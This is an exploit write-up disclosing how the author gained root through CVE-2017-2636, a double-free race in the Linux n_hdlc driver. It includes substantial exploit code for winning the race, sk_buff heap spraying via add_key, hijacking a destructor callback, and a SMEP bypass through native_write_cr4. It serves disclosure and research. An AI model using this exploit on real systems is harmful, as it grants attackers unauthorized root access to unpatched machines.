Linux kernel local privilege escalation flaw in n_hdlc(CVE-2017-2636)


This article discloses the exploitation of [CVE-2017-2636](https://www.cve.mitre.org/cgi-bin/cvename.cgi?name=2017-2636), which is a race condition in the `n_hdlc` Linux kernel driver (`drivers/tty/n_hdlc.c`). The described exploit gains root privileges bypassing Supervisor Mode Execution Protection (SMEP). This driver provides `HDLC` serial line discipline and comes as a kernel module in many Linux distributions, which have `CONFIG_N_HDLC=m` in the kernel config. So [RHEL 6/7](https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2017-2636), [Fedora](https://bugzilla.redhat.com/show_bug.cgi?id=1430049), [SUSE](https://bugzilla.novell.com/show_bug.cgi?id=CVE-2017-2636), [Debian](https://security-tracker.debian.org/tracker/CVE-2017-2636), and [Ubuntu](https://people.canonical.com/~ubuntu-security/cve/2017/CVE-2017-2636.html) were affected by CVE-2017-2636. Currently the flaw is [fixed](https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=82f2341c94d270421f383641b7cd670e474db56b) in the mainline Linux kernel ([public disclosure](http://seclists.org/oss-sec/2017/q1/569)). The bug was [introduced](https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=be10eb7589337e5defbe214dae038a53dd21add8) quite a long time ago, so the patch is backported to the stable kernel versions too. I've managed to make the proof-of-concept exploit quite stable and fast. It crashes the kernel very rarely and gains the root shell in less than 20 seconds (at least on my machines). This PoC defeats SMEP, but doesn't cope with Supervisor Mode Access Prevention (SMAP), although it is possible with some additional efforts. My PoC also doesn't defeat Kernel Address Space Layout Randomization (KASLR) and needs to know the kernel code offset. This offset can be obtained using a kernel pointer leak or the prefetch side-channel [attack](https://gruss.cc/files/prefetch.pdf) (see xairy's [implementation](https://github.com/xairy/kaslr-bypass-via-prefetch)). First of all let's watch the [demo video](https://youtu.be/nDCvRxWxN0Y)! ## The n_hdlc bug Initially, `N_HDLC` line discipline used a self-made singly linked list for data buffers and had `n_hdlc.tbuf` pointer for buffer retransmitting after an error. It worked, but the commit `be10eb75893` added data flushing and introduced racy access to `n_hdlc.tbuf`. After tx error concurrent [`flush_tx_queue()`](http://lxr.free-electrons.com/ident?i=flush_tx_queue) and [`n_hdlc_send_frames()`](http://lxr.free-electrons.com/ident?i=n_hdlc_send_frames) both use `n_hdlc.tbuf` and can put one buffer to `tx_free_buf_list` twice. That causes an exploitable double-free error in [`n_hdlc_release()`](http://lxr.free-electrons.com/ident?i=n_hdlc_release). The data buffers are represented by `struct n_hdlc_buf` and allocated in the `kmalloc-8192` slab cache. For fixing this bug, I [used](https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=82f2341c94d270421f383641b7cd670e474db56b) a standard kernel linked list and got rid of racy `n_hdlc.tbuf`: in case of tx error the current `n_hdlc_buf` item is put after the head of `tx_buf_list`. I started the investigation when got a suspicious kernel crash from [syzkaller](https://github.com/google/syzkaller). It is a really great project, which helped to fix an [impressively big list](https://github.com/google/syzkaller/wiki/Found-Bugs) of bugs in Linux kernel. ## Exploitation This article is the only way for me to publish the exploit code. So, please, be patient and prepare to plenty of listings! ### Winning the race Let's look to the code of the main loop: going to race till success. ``` for (;;) { long tmo1 = 0; long tmo2 = 0; if (loop % 2 == 0) tmo1 = loop % MAX_RACE_LAG_USEC; else tmo2 = loop % MAX_RACE_LAG_USEC; ``` The `loop` counter is incremented every iteration, so `tmo1` and `tmo2` variables are changing too. They are used for making lags in the racing threads, which: 1. synchronize at the `pthread_barrier`, 2. spin the specified number of microseconds in a busy loop, 3. interact with `n_hdlc`. Such a way of colliding threads helps to hit the race condition earlier. ``` ptmd = open("/dev/ptmx", O_RDWR); if (ptmd < 0) { perror("[-] open /dev/ptmx"); goto end; } ret = ioctl(ptmd, TIOCSETD, &ldisc); if (ret < 0) { perror("[-] TIOCSETD"); goto end; } ``` Here we open a pseudoterminal master and slave pair and set the `N_HDLC` line discipline for it. For more information about that, see `man ptmx`, [`Documentation/serial/tty.txt`](http://lxr.free-electrons.com/source/Documentation/serial/tty.txt) and [this](https://unix.stackexchange.com/questions/117981/what-are-the-responsibilities-of-each-pseudo-terminal-pty-component-software) great discussion about `pty` components. Setting `N_HDLC` ldisc for a serial line causes the `n_hdlc` kernel module autoloading. You can get the same effect using `ldattach` daemon. ``` ret = ioctl(ptmd, TCXONC, TCOOFF); if (ret < 0) { perror("[-] TCXONC TCOOFF"); goto end; } bytes = write(ptmd, buf, TTY_BUF_SZ); if (bytes != TTY_BUF_SZ) { printf("[-] write to ptmx (bytes)\n"); goto end; } ``` Here we suspend the pseudoterminal output (see `man tty_ioctl`) and write one data buffer. The `n_hdlc_send_frames()` fails to send this buffer and saves its address in `n_hdlc.tbuf`. We are ready for the race. Start two threads, which are allowed to run on all available CPU cores: * thread 1: flush the data with `ioctl(ptmd, TCFLSH, TCIOFLUSH)`; * thread 2: start the suspended output with `ioctl(ptmd, TCXONC, TCOON)`. In a lucky case, they both put the only written buffer pointed by `n_hdlc.tbuf` to `tx_free_buf_list`. Now we return to the CPU 0 and trigger possible double-free error: ``` ret = sched_setaffinity(0, sizeof(single_cpu), &single_cpu); if (ret != 0) { perror("[-] sched_setaffinity"); goto end; } ret = close(ptmd); if (ret != 0) { perror("[-] close /dev/ptmx"); goto end; } ``` We close the pseudoterminal master. The `n_hdlc_release()` goes through `n_hdlc_buf_list` items and frees the kernel memory used for data buffers. Here the possible double-free error happens. This particular bug is successfully detected by the Kernel Address Sanitizer ([KASAN](https://lwn.net/Articles/612153/)), which reports the use-after-free happening just before the second `kfree()`. The final part of the main loop: ``` ret = exploit_skb(socks, sockaddrs, payload, loop % SOCK_PAIRS); if (ret != EXIT_SUCCESS) goto end; if (getuid() == 0 && geteuid() == 0) { printf("[+] race #%ld: WIN! flush(%ld), TCOON(%ld)\n", loop, tmo1, tmo2); break; /* :) */ } loop++; } printf("[+] finish as: uid=0, euid=0, start sh...\n"); run_sh(); ``` Here we try to exploit the double-free error by overwriting `struct sk_buff`. In case of success, we exit from the main loop and run the root shell in the child process using `execve()`. ### Exploiting the sk_buff As I mentioned, the doubly freed `n_hdlc_buf` item is allocated in the `kmalloc-8192` slab cache. For exploiting double-free error for this cache, we need some kernel objects with the size a bit less than 8 kB. Actually, we need two types of such objects: * one containing some function pointer, * another one with the controllable payload, which can overwrite that pointer. Searching for such kernel objects and experimenting with them was not easy and took me some time. Finally, I've chosen `sk_buff` with its `destructor_arg` in `struct skb_shared_info`. This approach is not new – consider reading the cool write-up about [CVE-2016-2384](https://xairy.github.io/blog/2016/cve-2016-2384). The network-related buffers in Linux kernel are represented by `struct sk_buff`. See [these](http://vger.kernel.org/~davem/skb_data.html) great pictures describing `sk_buff` data layout. The most important for us is that the network data and `skb_shared_info` are placed in the same kernel memory block pointed by `sk_buff.head`. So creating a 7500-byte network packet in the userspace will make `skb_shared_info` be allocated in the `kmalloc-8192` slab cache. Exactly like we want. But there is one challenge: `n_hdlc_release()` frees 13 `n_hdlc_buf` items straight away. At first I was trying to do the heap spray in parallel with `n_hdlc_release()`, but didn't manage to inject the corresponding `kmalloc()` between the needed `kfree()` calls. So I used another way: spraying **after** `n_hdlc_release()` can give two `sk_buff` items with the `head` pointing to the same memory. That's promising. So we need to spray hard but keep 8 kB UDP packets allocated to avoid mess in the allocator freelist. Socket queues are limited in size, so I've created a lot of sockets using `socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP)`: * one client socket for sending UDP packets, * one dedicated server socket, which is likely to receive two packets with the same `sk_buff.head`, * 200 server sockets for receiving other packets emitted during heap spray, * 200 server sockets for receiving the packets emitted during slab exhaustion. Ok. Now we need another kernel object for overwriting the function pointer in `skb_shared_info.destructor_arg`. We can't use `sk_buff.head` for that again, because `skb_shared_info` is placed at the same offset in `sk_buff.head` and we don't control it. I was really happy to find that `add_key` syscall is able to allocate the controllable data in the `kmalloc-8192` too. But I became upset when encountered key data quotas in `/proc/sys/kernel/keys/` owned by root. The default value of `/proc/sys/kernel/keys/maxbytes` is 20000\. It means that only 2 `add_key` syscalls can concurrently store our 8 kB payload in the kernel memory, and that's not enough. But the happiness returned when I encountered the bright idea at the [slides](https://speakerdeck.com/retme7/talk-is-cheap-show-me-the-code) of Di Shen from [Keen Security Lab](http://keenlab.tencent.com/en/): I can make the heap spray successful even if `add_key` fails! So, let's look at the `init_payload()` code: ``` #define MMAP_ADDR 0x10000lu #define PAYLOAD_SZ 8100 #define SKB_END_OFFSET 7872 #define KEY_DATA_OFFSET 18 int init_payload(char *p) { struct skb_shared_info *info = (struct skb_shared_info *)(p + SKB_END_OFFSET - KEY_DATA_OFFSET); struct ubuf_info *uinfo_p = NULL; ``` The definition of `struct skb_shared_info` and `struct ubuf_info` is copied to the exploit code from [`include/linux/skbuff.h`](http://lxr.free-electrons.com/source/include/linux/skbuff.h) kernel header. The payload buffer will be passed to `add_key` as a parameter, and the data which we put there at `7872 - 18 = 7854` byte offset will exactly overwrite `skb_shared_info`. ``` char *area = NULL; void *target_addr = (void *)(MMAP_ADDR); area = mmap(target_addr, 0x1000, PROT_READ | PROT_WRITE, MAP_FIXED | MAP_PRIVATE | MAP_ANONYMOUS, -1, 0); if (area != target_addr) { perror("[-] mmap\n"); return EXIT_FAILURE; } uinfo_p = target_addr; uinfo_p->callback = (uint64_t)root_it; info->destructor_arg = (uint64_t)uinfo_p; info->tx_flags = SKBTX_DEV_ZEROCOPY; ``` The `ubuf_info.callback` is called in [`skb_release_data()`](http://lxr.free-electrons.com/ident?i=skb_release_data) if `skb_shared_info.tx_flags` has `SKBTX_DEV_ZEROCOPY` flag set to 1\. In our case, `ubuf_info` item resides in the userspace memory, so dereferencing its pointer in the kernelspace will be detected by SMAP. Anyway, now the `callback` points to `root_it()`, which does the classical `commit_creds(prepare_kernel_cred(0))`. However, this shellcode resides in the userspace too, so executing it in the kernelspace will be detected by SMEP. We are going to bypass it soon. #### Heap spraying and stabilization As I mentioned, `n_hdlc_release()` frees thirteen `n_hdlc_buf` items. Our `exploit_skb()` is executed shortly after that. Here we do the actual heap spraying by sending twenty 7500-byte UDP packets. Experiments showed that the packets number 12, 13, 14, and 15 are likely to be exploitable, so they are sent to the dedicated server socket. Now we are going to perform the use-after-free on `sk_buff.data`: * receive 4 network packets on the dedicated server socket one by one, * execute several `add_key` syscalls with our payload after receiving each of them. The exact number of `add_key` syscalls giving the best results was found empirically by testing the exploit many times. The example of `add_key` call: ``` k[0] = syscall(__NR_add_key, "user", "payload0", payload, PAYLOAD_SZ, KEY_SPEC_PROCESS_KEYRING); ``` If we won the race and did the heap spraying luckily, then our shellcode is executed when the poisoned packet is received. After that we can invalidate the keys that were successfully allocated in the kernel memory: ``` for (i = 0; i < KEYS_N; i++) { if (k[i] > 0) syscall(__NR_keyctl, KEYCTL_INVALIDATE, k[i]); } ``` Now we need to prepare the heap to the next round of `n_hdlc` racing. The `/proc/slabinfo` shows that `kmalloc-8192` slab stores only 4 objects, so double-free error has high chances to crash the allocator. But the following trick helps to avoid that and makes the exploit much more stable – send a dozen UDP packets to fill the partially emptied slabs. ### SMEP bypass As I mentioned, the `root_it()` shellcode resides in the userspace. Executing it in the kernelspace is detected by [SMEP](http://vulnfactory.org/blog/2011/06/05/smep-what-is-it-and-how-to-beat-it-on-linux/) (Supervisor Mode Execution Protection). It is an x86 feature, which is enabled by toggling the bit 20 of CR4 register. There are several approaches to defeat it, for example, Vitaly Nikolenko [describes](https://www.syscan360.org/slides/2016_SG_Vitaly_Nikolenko_Practical_SMEP_Bypass_Techniques.pdf) how to switch off SMEP using stack pivoting ROP technique. It works great, but I didn't want to copy it blindly. So I've created another quite funny way to defeat SMEP without ROP. Please inform me if that approach is already known. In [`arch/x86/include/asm/special_insns.h`](http://lxr.free-electrons.com/source/arch/x86/include/asm/special_insns.h) I've found this function: ``` static inline void native_write_cr4(unsigned long val) { printk("wcr4: 0x%lx\n", val); asm volatile("mov %0,%%cr4": : "r" (val), "m" (__force_order)); } ``` It writes its first argument to CR4. Now let's look at `skb_release_data()`, which executes the hijacked `callback` in the Ring 0: ``` if (shinfo->tx_flags & SKBTX_DEV_ZEROCOPY) { struct ubuf_info *uarg; uarg = shinfo->destructor_arg; if (uarg->callback) uarg->callback(uarg, true); } ``` We see that the destructor `callback` takes `uarg` address as the first argument. And we control this address in the exploited `sk_buff`. So I've decided to write the address of `native_write_cr4()` to `ubuf_info.callback` and put `ubuf_info` item at the mmap'ed userspace address `0x406e0`, which is the correct value of CR4 with disabled SMEP. In that case SMEP is disabled on one CPU core without any ROP. However, now we need to win the race twice: first time to disable SMEP, second time to execute the shellcode. But it's not a problem for this particular exploit since it is fast and reliable. So let's initialize the payload a bit differently: ``` #define CR4_VAL 0x406e0lu void *target_addr = (void *)(CR4_VAL & 0xfffff000lu); area = mmap(target_addr, 0x1000, PROT_READ | PROT_WRITE, MAP_FIXED | MAP_PRIVATE | MAP_ANONYMOUS, -1, 0); if (area != target_addr) { perror("[-] mmap\n"); return EXIT_FAILURE; } uinfo_p = (struct ubuf_info *)CR4_VAL; uinfo_p->callback = NATIVE_WRITE_CR4; info->destructor_arg = (uint64_t)uinfo_p; info->tx_flags = SKBTX_DEV_ZEROCOPY; ``` That SMEP bypass looks witty, but introduces one additional requirement - it needs bit 18 (OSXSAVE) of CR4 set to 1\. Otherwise `target_addr` becomes 0 and `mmap()` fails, since mapping the zero page is not allowed. ## Conclusion Investigating of `CVE-2017-2636` and writing this article was a big fun for me. I want to thank [Positive Technologies](https://www.ptsecurity.com/ww-en/) for giving me the opportunity to work on this research. I would really appreciate feedback. See my contacts below.